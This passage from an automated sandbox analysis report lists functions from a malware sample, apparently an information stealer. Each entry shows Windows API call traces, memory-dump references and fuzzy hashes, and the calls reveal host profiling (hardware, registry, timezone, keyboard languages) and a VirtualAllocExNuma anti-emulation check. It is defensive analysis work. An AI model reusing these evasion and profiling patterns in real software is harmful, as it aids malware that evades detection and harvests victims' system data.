                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2311089104-0
                                                                                                                                                                                                              • Opcode ID: 56835c3e322f93e40f13d05bd1804f66c476986d00561130359a0d3c42d2ef3c
                                                                                                                                                                                                              • Instruction ID: 094bbb162656dc47c981d8b825551d719604af8fd8be9e62c02dc0ae38471da0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56835c3e322f93e40f13d05bd1804f66c476986d00561130359a0d3c42d2ef3c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC115B70901114EFDF219FA4EC88EAFBBB8EF48740F200588F451A7158DB719E85DB11
                                                                                                                                                                                                              Function 0093172C Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 00931733
                                                                                                                                                                                                              • CoCreateInstance.OLE32(009531B0,00000000,00000001,0095B008,?,00000018,009318D6,?), ref: 00931756
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00931763
                                                                                                                                                                                                              • _wtoi64.MSVCRT ref: 00931796
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 009317AF
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 009317B6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 181426013-0
                                                                                                                                                                                                              • Opcode ID: bf88c1cfcfec9acc608cac690d575140e81078c9c277bd3401c56dffdf663c49
                                                                                                                                                                                                              • Instruction ID: fd9dbc69c51860a33d332d9bed0408a56b0d128f707a1947f5b18294006879dd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf88c1cfcfec9acc608cac690d575140e81078c9c277bd3401c56dffdf663c49
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B711587490830ADFCB00DFA5C898AAEBFB5FF88311F548069F516E72A0DB714945DB61
                                                                                                                                                                                                              Function 009210F0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 009210AA
                                                                                                                                                                                                              • _memset.LIBCMT ref: 009210D0
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 009210E6
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,00938658), ref: 00921100
                                                                                                                                                                                                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00921107
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00921112
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1859398019-0
                                                                                                                                                                                                              • Opcode ID: d6672453ecae43294884c8aa9b5e180d6a000ffa1d61304408b8bdaa18be9be3
                                                                                                                                                                                                              • Instruction ID: dc3f27bf50cf5b4a07f741d95d3ddc17ed37a1feb42c883dcaf5b28d9d0a4503
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6672453ecae43294884c8aa9b5e180d6a000ffa1d61304408b8bdaa18be9be3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 70F0C2727C532077E22126763C5EFBB2A5C9B91F62F204020F708EB2C0D6659914E7B8
                                                                                                                                                                                                              Function 00931659 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 009316A3
                                                                                                                                                                                                                • Part of subcall function 009323AA: malloc.MSVCRT ref: 009323AF
                                                                                                                                                                                                                • Part of subcall function 009323AA: strncpy.MSVCRT ref: 009323C0
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 009316CB
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00956ED4,?,?,?,?,?), ref: 009316E8
                                                                                                                                                                                                              • GetCurrentHwProfileA.ADVAPI32(?), ref: 00931674
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                                                                                                              • String ID: Unknown
                                                                                                                                                                                                              • API String ID: 2781187439-1654365787
                                                                                                                                                                                                              • Opcode ID: d5726fc1a2e6f0dd8b68aca94f8b645ca7346c1ca273d64d08d5935f56854b9d
                                                                                                                                                                                                              • Instruction ID: 2c8c35cbf8d1c95807100a2e6c167a7074c6dc132cae572ac7e7cc8fd74c913c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5726fc1a2e6f0dd8b68aca94f8b645ca7346c1ca273d64d08d5935f56854b9d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87116375900228ABDB11EB74DC96FDD73B8AF48300F4044A5B649E7151DA74AF888F54
                                                                                                                                                                                                              Function 0093BDB2 Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,75BF74F0,?,0093CD7F,?,0093CE0D,00000000,06400000,00000003,00000000,0093770B,.exe,00956C64), ref: 0093BDFF
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,75BF74F0,?,0093CD7F,?,0093CE0D,00000000,06400000,00000003,00000000), ref: 0093BE37
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CreatePointer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2024441833-0
                                                                                                                                                                                                              • Opcode ID: a906c056d926c6ae243763217a29cfe6b11d54f255a169ad24d6855ac3138739
                                                                                                                                                                                                              • Instruction ID: 651264479f094726e1321b294f80fbbb9b6beb5a83e12878d5f7442d4965e603
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a906c056d926c6ae243763217a29cfe6b11d54f255a169ad24d6855ac3138739
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A13143B4504B059FDB309F39C884BA77AECAB14759F108E2EE39686681D3749C84DFA1
                                                                                                                                                                                                              Function 00924AB6 Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AE8
                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AEE
                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AF4
                                                                                                                                                                                                              • lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00924B06
                                                                                                                                                                                                              • InternetCrackUrlA.WININET(000000FF,00000000), ref: 00924B0E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CrackInternetlstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1274457161-0
                                                                                                                                                                                                              • Opcode ID: 3f858470bb65307d27a281abc15c846e04ed64504239bc0e06df07aeeed4f8c8
                                                                                                                                                                                                              • Instruction ID: 6e4ed8cc7971937dfd885ade1137c28c25295f46e9aa5ecd0933a9e2863d019c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f858470bb65307d27a281abc15c846e04ed64504239bc0e06df07aeeed4f8c8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5011B32D00218ABCB149BA9EC45ADEBFB8AF55330F108216F925F72E1DA7496018B94
                                                                                                                                                                                                              Function 00930F26 Relevance: 7.5, APIs: 5, Instructions: 35registrymemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00934292,Processor: ,[Hardware],00956958,00000000,TimeZone: ,00956948,00000000,Local Time: ,00956934), ref: 00930F3A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00934292,Processor: ,[Hardware],00956958,00000000,TimeZone: ,00956948,00000000,Local Time: ,00956934,Keyboard Languages: ,00956918), ref: 00930F41
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00956890,?,?,?,00934292,Processor: ,[Hardware],00956958,00000000,TimeZone: ,00956948,00000000,Local Time: ), ref: 00930F5F
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00956890,00000000,00000000,00000000,000000FF,?,?,?,00934292,Processor: ,[Hardware],00956958,00000000,TimeZone: ,00956948,00000000), ref: 00930F7B
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00956890,?,?,?,00934292,Processor: ,[Hardware],00956958,00000000,TimeZone: ,00956948,00000000,Local Time: ,00956934,Keyboard Languages: ,00956918), ref: 00930F84
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3466090806-0
                                                                                                                                                                                                              • Opcode ID: d12f7bc5cf3776ed68ff926b26238cf8ed7c7b0b73033c7e70d4c7ebc067d5f4
                                                                                                                                                                                                              • Instruction ID: c08cbb77564fea8dca7b3e5b20209de3db69f6c60b57f8317fa4b20ffde69b7f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d12f7bc5cf3776ed68ff926b26238cf8ed7c7b0b73033c7e70d4c7ebc067d5f4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EDF03075640304FFEB115B90DC4AFAE7A7CEF48B04F1401A4F715AB0A1DBB099809B24
                                                                                                                                                                                                              Function 00936F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 00936F59
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,0000001C), ref: 00936F64
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00936FE8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_catchlstrlen
                                                                                                                                                                                                              • String ID: ERROR
                                                                                                                                                                                                              • API String ID: 591506033-2861137601
                                                                                                                                                                                                              • Opcode ID: 7bed47a488c11d8315616f611353c971e4b8eeba2780c5a1f60b948e126ca54b
                                                                                                                                                                                                              • Instruction ID: dd3f9d6029284f4495e2b50f1354f6cae43b3613ba8f367b1ad97ab4a7bf6024
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7bed47a488c11d8315616f611353c971e4b8eeba2780c5a1f60b948e126ca54b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1114C7190050AAFCB50FF64E946B9DBBB0BF84310F504221E818E3965EB35EAA4CFC1
                                                                                                                                                                                                              Function 0092B307 Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0092B3AC
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0092B4FE
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0092B519
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0092B56B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 211194620-0
                                                                                                                                                                                                              • Opcode ID: c2bcb194c341d9a0f261430bba2283358c66e8b5befe5c93c799b8225eff001e
                                                                                                                                                                                                              • Instruction ID: 1db1ec8b0d194d4192066d9b3c7a53e34874938ddefd6593b8971961db09979e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2bcb194c341d9a0f261430bba2283358c66e8b5befe5c93c799b8225eff001e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB71F836900129ABCF05FBA4ED46ADDBB75AF84305F514121F944B716ADB30AE858F90
                                                                                                                                                                                                              Function 0092D3E3 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0092E72B,?,?,?), ref: 00927FC7
                                                                                                                                                                                                                • Part of subcall function 00927FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FDE
                                                                                                                                                                                                                • Part of subcall function 00927FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FF5
                                                                                                                                                                                                                • Part of subcall function 00927FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0092E72B,?,?,?), ref: 0092800C
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CloseHandle.KERNEL32(?,?,?,?,?,0092E72B,?,?,?), ref: 00928034
                                                                                                                                                                                                                • Part of subcall function 00931DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00936973,?), ref: 00931E0C
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,?,00957530,0095687B), ref: 0092D474
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0092D487
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
